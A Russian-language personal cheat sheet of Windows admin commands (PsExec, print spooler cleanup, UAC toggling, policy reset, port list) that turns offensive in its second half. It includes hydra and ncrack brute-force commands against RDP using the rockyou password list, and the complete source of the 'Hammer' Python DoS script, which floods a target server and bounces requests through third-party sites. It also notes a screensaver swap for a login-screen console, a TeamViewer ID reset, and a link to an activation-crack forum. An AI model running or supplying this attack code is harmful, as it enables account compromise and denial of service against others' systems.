%LOCALAPPDATA%  - \Users\USERNAME\AppData\Local
%NUMBER_OF_PROCESSORS% - количество потоков
%OS%
%Path% - откуда запускать программы
%PATHEXT% .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC - исполнительные файлы
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
PUBLIC=C:\Users\Public
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\Windows

________________________________________________________________________________________
________________________________________________________________________________________

Pstools от Марка Русиновича
пример запуска проги на всех пк
1.поменять время на серве
2.запустить cmd
3.перейти в папку cd c:\pstools
4.psexec \\* -u domain\user -p pass net stop w32time дождаться выполнения
(psexec \\* -u rustour\Администратор -p pass stop w32time)
5.psexec \\* -u domain\user -p pass net start w32time
примеры
psexec \\{computerName} cmd
pslist \\{computerName} /s
pskill \\{computerName} {processNameOrPid}
________________________________________________________________________________________

Очистка очереди печати
net stop spooler
del %systemroot%\system32\spool\printers\*.shd
del %systemroot%\system32\spool\printers\*.spl
net start spooler

_________________________________________________________________________________________

logon.scr < cmd.exe так можно обеспечить консоль по заставке
_________________________________________________________________________________________

Каталог c:\windows\prefetch служит для ускорения загрузки windows.
Если система начинает долго грузится, то очистка каталога prefetch может решить проблему с долгой загрузкой.
_________________________________________________________________________________________

Windows update/обновление очистка кеша обновления
net stop wuauserv отключаем службу обновления windows
Удаляем или переименовываем папку «SoftwareDistribution» в корне папки c:\windows
_________________________________________________________________________________________

Список всех настроек в одном месте
1. Щелкните правой кнопкой мыши на любом пустом пространстве рабочего стола.
2. Перейдите в меню Создать и создайте новую папку.
3. Переименуйте папку следующим образом: ЛюбоеИмя.{ED7BA470-8E54-465E-825C-99712043E01C}
_________________________________________________________________________________________

Настройки radmin
C:\Windows\SysWOW64\rserver30\RServer3.exe /setup
C:\Windows\SysWOW64\rserver30\RServer3.exe /stop
C:\Windows\SysWOW64\rserver30\RServer3.exe /uninstall
C:\Windows\SysWOW64\rserver30\RServer3.exe /intuninstall
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Remote Administrator v2.2" /f
sc delete Rserver3
del /f /s /q C:\Windows\SysWOW64\rserver30\*
rmdir /s /q "C:\Windows\SysWOW64\rserver30\
_________________________________________________________________________________________

Отключить UAC
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Включить UAC
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

_________________________________________________________________________________________

Локальные политик безопасности (local security policies) настраиваются с помощью отдельной
консоли управления secpol.msc. Если проблемы с компьютером вызваны «закручиванием гаек» в локальных
 политик безопасности, и если у пользователя остался доступ к системе и административные права,
сначала стоит попробовать сбросить параметры безопасности системы к значениям по умолчанию.

Для этого в командной строке с правами администратора выполните:

Для Windows XP:
secedit /configure /cfg %windir%\repair\secsetup.inf /db secsetup.sdb /verbose

Для Windows 8, Windows 7 и Vista:
secedit /configure /cfg %windir%\inf\defltbase.inf /db defltbase.sdb /verbose

_________________________________________________________________________________________

Чтобы удалить все текущие настройки локальных групповых политик, необходимо  удалить
файлы Registry.pol в каталоге GroupPolicy. Сделать это можно следующими командами,
запущенными в командной строке с правами администратора:

RD /S /Q "%WinDir%\System32\GroupPolicyUsers"

RD /S /Q "%WinDir%\System32\GroupPolicy"

gpupdate /force

_________________________________________________________________________________________

netsh interface ip delete arpcache  Очистка Arp cache (MAC)
arp -d <ip address> Очистка Arp cache (MAC)
arp -s <ip address> <mac address> Добавить статическую запись в arp-таблицу
_________________________________________________________________________________________

sysprep /oobe  /generalize /shutdown
C:\Windows\System32\sysprep\sysprep.exe /oobe  /generalize /shutdown

_________________________________________________________________________________________

Ports Порты Windows Firewall
    Подразумевается использование протокола TCP там, где не оговорено иное.
    DISCARD: 9, Discard port (RFC 863)
    FTP: 21 для команд, 20 для данных
    SSH: 22 — удалённое управление хостом с ОС UNIX/Linux/BSD (если разрешено)
    telnet: 23 — подключение для удалённого управления сетевыми устройствами (если такой сервис поддерживается)
    SMTP: 25
    SMTP c SSL: 465, 587
    DNS: 53 (UDP) — необходимо для работы большинства служб Интернета на ПК обычного пользователя
    DHCP: 67, 68/UDP
    TFTP: 69/UDP
    HTTP: 80, 8080 — если закрыть, браузер не будет отображать страницы
    POP3: 110
    POP3 с SSL: 995
    NTP: 123 (time server) (UDP)
    IMAP: 143
    IMAP с SSL: 993
    SNMP: 161 — мониторинг и управление сетевыми устройствами, которые поддерживают такой сервис
    HTTPS: 443 — используется для веб-сайтов с защищённым соединением
    Understanding Shared Folders(Общие папки): TCP 139, 445 UDP 137, 138
    СУБД Oracle : 1521
    СУБД MySQL: 3306
    RDP: 3389 — удалённое управление хостом с ОС Windows (если не запрещено)
    SIP: 5060 (TCP / UDP) — управление вызовами в IP-телефонии, однако для передачи медиа-трафика в VoIP используется также широкий диапазон UDP-портов       
    (см. RTP/RTCP), которые также должны быть открыты
    OSCAR (ICQ): 5190
    XMPP (Jabber): 5222/5223 — клиент-сервер, 5269 — сервер-сервер
    BitTorrent: 6969, 6881—6889
    traceroute: выше 33434 (UDP) (в некоторых источниках указано, что достаточно указать диапазон портов от 33434 до 33534)

open     - программа-сервер готова принимать подключения
listen     - сервер слушает данный порт
filtred - файрвол или иная причина не позволяет nmap’у определить открыт или закрыт порт
closed     - порт закрыт
_________________________________________________________________________________________

TM teamviewer
Ну вообще он привязывается к MAC-адресу... Потому чтобы сменить ID, нужно сделать 4 вещи:
1) Удалить hkcu\software\teamviewer
2) Удалить hklm\software\teamviewer
3) Удалить %AppData%\TeamViewer
4) Поменять MAC сетевой карты
_________________________________________________________________________________________
_________________________________________________________________________________________

Ссылки
http://forums.mydigitallife.info/forums/39-Windows-Loader
http://www.forensit.com/downloads.html --User Profile Wizard 3.7 прога для переноса профиля пользователя
http://www.cmdhelp.ru/index.php?commands список команд
https://msdn.microsoft.com/ru-ru/subscriptions/downloads iso
http://ip-calculator.ru/ ip калькулятор
http://bsodstop.ru/kod-bsod коды синего экрана
http://www.artlebedev.ru/tools/decoder/ определение кодировки
_________________________________________________________________________________________
_________________________________________________________________________________________

rdp brute

hydra -t 4 -V -l IEUser -P /root/Desktop/Password/rockyou.txt rdp://192.168.56.102

-t = TASKS run TASKS number of connects in parallel (per host, default: 16) RDP set to maximum of 4.

-V = Verbose shows you the attempted passwords.

-l = Username

-P = Password list

rdp:// = Port 3389


ncrack -p 3389 -v -user IEUser -P /root/Desktop/Password/rockyou.txt 192.168.56.102

-p = Port number

-v = Verbose shows you any found passwords in realtime

-user = username

-P = Password list

python 3.3.2+ Dos Script

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# python 3.3.2+ Dos Script v.1

from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random

def user_agent():
    global uagent
    uagent=[]
    uagent.append("uagent Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
    uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
    uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
    uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
    uagent.append("uagent=[]Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
    uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
    uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
    return(uagent)


def my_bots():
    global bots
    bots=[]
    bots.append("http://validator.w3.org/check?uri=")
    bots.append("http://www.facebook.com/sharer/sharer.php?u=")
    return(bots)


def bot_hammering(url):
    try:
        while True:
            req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
            print("\033[94mbot is hammering...\033[0m")
            time.sleep(.1)
    except:
        time.sleep(.1)


def down_it(item):
    try:
        while True:
            packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host,int(port)))
            if s.sendto( packet, (host, int(port)) ):
                s.shutdown(1)
                print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--packet sent! hammering--> \033[0m")
            else:
                s.shutdown(1)
                print("\033[91mshut<->down\033[0m")
            time.sleep(.1)
    except socket.error as e:
        print("\033[91mno connection! server maybe down\033[0m")
        #print("\033[91m",e,"\033[0m")
        time.sleep(.1)


def dos():
    while True:
        item = q.get()
        down_it(item)
        q.task_done()


def dos2():
    while True:
        item=w.get()
        bot_hammering(random.choice(bots)+"http://"+host)
        w.task_done()


def usage():
    print (''' \033[92m    Hammer Dos Script v.1 http://www.canyalcin.com/
    It is the end user's responsibility to obey all applicable laws.
    It is just for server testing script. Your ip is visible. \n
    usage : python3 hammer.py [-s] [-p] [-t]
    -h : help
    -s : server ip
    -p : port default 80
    -t : turbo default 135 \033[0m''')
    sys.exit()


def get_parameters():
    global host
    global port
    global thr
    global item
    optp = OptionParser(add_help_option=False,epilog="Hammers")
    optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
    optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
    optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
    optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
    optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
    opts, args = optp.parse_args()
    logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
    if opts.help:
        usage()
    if opts.host is not None:
        host = opts.host
    else:
        usage()
    if opts.port is None:
        port = 80
    else:
        port = opts.port
    if opts.turbo is None:
        thr = 135
    else:
        thr = opts.turbo


# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
#task queue are q,w
q = Queue()
w = Queue()


if __name__ == '__main__':
    if len(sys.argv) < 2:
        usage()
    get_parameters()
    print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m")
    print("\033[94mPlease wait...\033[0m")
    user_agent()
    my_bots()
    time.sleep(5)
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host,int(port)))
        s.settimeout(1)
    except socket.error as e:
        print("\033[91mcheck server ip and port\033[0m")
        usage()
    while True:
        for i in range(int(thr)):
            t = threading.Thread(target=dos)
            t.daemon = True  # if thread is exist, it dies
            t.start()
            t2 = threading.Thread(target=dos2)
            t2.daemon = True  # if thread is exist, it dies
            t2.start()
        start = time.time()
        #tasking
        item = 0
        while True:
            if (item>1800): # for no memory crash
                item=0
                time.sleep(.1)
            item = item + 1
            q.put(item)
            w.put(item)
        q.join()
        w.join()